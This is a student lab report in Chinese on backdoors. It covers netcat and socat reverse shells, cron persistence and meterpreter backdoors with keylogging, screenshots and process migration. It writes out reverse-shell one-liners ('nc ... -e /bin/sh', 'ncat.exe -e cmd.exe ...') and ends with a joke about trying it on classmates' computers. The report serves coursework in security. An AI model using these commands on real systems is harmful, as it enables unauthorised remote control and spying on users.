20145222 黄亚奇 《网络攻防》 后门原理与实践

20145222 黄亚奇 《网络攻防》 后门原理与实践

实验内容概述

  • 简单实用netcat和socat获取靶机shell,并实现任务计划启动;
  • 使用msf-meterpreter生成可执行后门文件获取靶机shell,并进行一些命令作,如查看ip、截屏、记录键盘输入、获取ruby交互界面、进程迁移、安装成服务等。

基础问题回答

  • 例举你能想到的一个后门进入到你系统中的可能方式?
    通过邮件发送,并不小心点开了恶意链接;
    U盘里的文件不安全,插入电脑将其文件保存在电脑内;
    上不可靠、不安全的网站,误点小广告;
    云盘里共享的文件可能带有恶意代码,将其下载并保存在了电脑里。
  • 例举你知道的后门如何启动起来(win及linux)的方式?
    自己不小心点击运行了后门程序;
    篡改了注册表,将其设为开机自动运行;
    被控端被设置了cron启动,定时循环启动;
    被控端被设置了任务计划启动,在被控端达到某个条件时程序运行,且此时控制端可自由连接控制被控端;
    与其他具有正常功能的程序进行了绑定,在运行正常程序时,连带着运行后门;
    后门被设置为成服务,且其名字与系统服务名字类似。
  • Meterpreter有哪些给你映像深刻的功能?
    可以将后门程序迁移到其他正在运行的正常程序里,能隐藏得很深
    可以用被控端的命令,截个当前被控端的屏幕、获取被控端的键盘录入
    可以使用MSF自带的POST模块,像导出被控端用户密码之类的
  • 如何发现自己有系统有没有被安装后门?
    查看注册表、进程、服务等,是否有未知的程序

实验过程

1.使用netcat获取主机操作Shell,cron启动

1-1 linux获取windows的shell

  • windows 打开监听:ncat.exe -l -p 5222;
  • Linux反弹连接win: nc ip_of_win 5222 -e /bin/sh;
  • windows下获得一个linux shell,可运行任何指令,如ls.

1-2 Linux获得Windows的Shell

  • Linux运行监听指令:nc -l -p 5222;
  • Windows反弹连接Linux:ncat.exe -e cmd.exe ip_of_linux 5222;
  • Linux下看到Windows的命令提示:

  • 通过在kali中输入cmd命令write来控制(打开)win系统的写字板:

2.设置cron启动,使用netcat获得linux shell

  • 使用cron指令设置定时任务并查看

  • 设置:在40分的时候,win成功获取Linux的shell;其中一直打开necat监听。

3.使用sotcat:win获得linux shell

  • 在linux中,使用socat绑定bash与端口号,监听,等待连接;
  • win中使用socat对linux进行tcp固定端口连接,成功获取linux shell。

4.使用MSF meterpreter生成后门并传到被控主机获取shell

  • 创建后门,可执行程序复制kali原有的的然后改个名,输入命令行传送程序至windows;

  • msf打开监听,ip和端口号等参数要进行修改,跟后门一致。

  • 这时再双击启动win上的可执行文件,linux成功获取win shell

  • 使用MSF meterpreter生成获取目标主机某些内容:截屏。

实验感想

没了杀毒软件和防火墙,电脑真的好脆弱,一句感慨:这几年来,我可能用的是一台“假的”笔记本,无数双“眼睛”都在盯着我的操作。做完实验才知道真的要多多加强电脑的自我保护。
这个实验做完之后感觉其实挺简单的,但自己却花了大量时间来完成,说明自己练习还是太少,对于电脑一些的操作还是很生疏,需要多练一练。
通过这次实验,自己也掌握了后门程序的一些应用知识,知己知彼,方能百战百胜。实验完后,都忍不住拿同学的电脑来做实验了,哈哈。

原文地址:https://www.cnblogs.com/huangyaqi/p/6554896.html